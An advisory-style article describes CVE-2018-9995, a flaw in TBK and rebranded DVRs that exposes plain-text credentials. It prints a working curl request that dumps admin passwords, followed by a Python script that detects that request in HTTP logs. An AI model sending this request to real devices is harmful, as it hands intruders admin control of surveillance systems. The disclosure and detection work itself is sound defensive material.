A vulnerability that exposes plain text credentials on affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is outlined in CVE-2018-9995.
The DVRs affected are manufactured by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple curl command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).
The plain text credentials returned from this command granted admin access to the device.
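
For defenders, the request above has a distinctive shape that can be searched for in HTTP logs from a proxy or network sensor sitting in front of these DVRs. The following detection sketch is an added example, not code from IPVM or the researcher; the JSON log schema (`src`, `dst`, `uri`, `cookie`, `status`) and all sample records are constructed assumptions.

```python
import json
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample records (JSON lines); the field names are an assumed schema.
SAMPLE_LOG = """\
{"src": "203.0.113.7", "dst": "192.0.2.10", "uri": "/device.rsp?opt=user&cmd=list", "cookie": "uid=admin", "status": 200}
{"src": "203.0.113.7", "dst": "192.0.2.10", "uri": "/device.rsp?cmd=list&opt=user", "cookie": "lang=en; uid=admin", "status": 200}
{"src": "198.51.100.4", "dst": "192.0.2.10", "uri": "/DEVICE.RSP?opt=user&cmd=list", "cookie": "", "status": 401}
{"src": "198.51.100.9", "dst": "192.0.2.10", "uri": "/login.rsp", "cookie": "uid=admin", "status": 200}
{"src": "198.51.100.9", "dst": "192.0.2.10", "uri": "/device.rsp?opt=sys&cmd=list", "cookie": "uid=admin", "status": 200}
"""

def parse_cookies(header):
    """Split a Cookie header into a lower-cased name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip().lower()] = value.strip()
    return cookies

def classify(record):
    """Return None, 'probe' or 'credentials-likely-returned' for one record."""
    url = urlsplit(record.get("uri", ""))
    # Match case-insensitively and after URL-decoding: over-matching is cheap here.
    if unquote(url.path).lower() != "/device.rsp":
        return None
    query = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(url.query).items()}
    if "user" not in query.get("opt", []) or "list" not in query.get("cmd", []):
        return None
    admin_cookie = parse_cookies(record.get("cookie", "")).get("uid") == "admin"
    # User-list request + uid=admin cookie + HTTP 200 is the CVE-2018-9995 pattern.
    return "credentials-likely-returned" if admin_cookie and record.get("status") == 200 else "probe"

def scan(log_text):
    """Return (src, dst, verdict) for every record matching the request shape."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # skip blank or malformed lines
        verdict = classify(rec)
        if verdict:
            hits.append((rec.get("src"), rec.get("dst"), verdict))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The request shape alone does not prove malicious intent, so triage hits by whether the source address is an expected administration host, and treat any `credentials-likely-returned` hit from elsewhere as a reason to rotate the DVR's passwords.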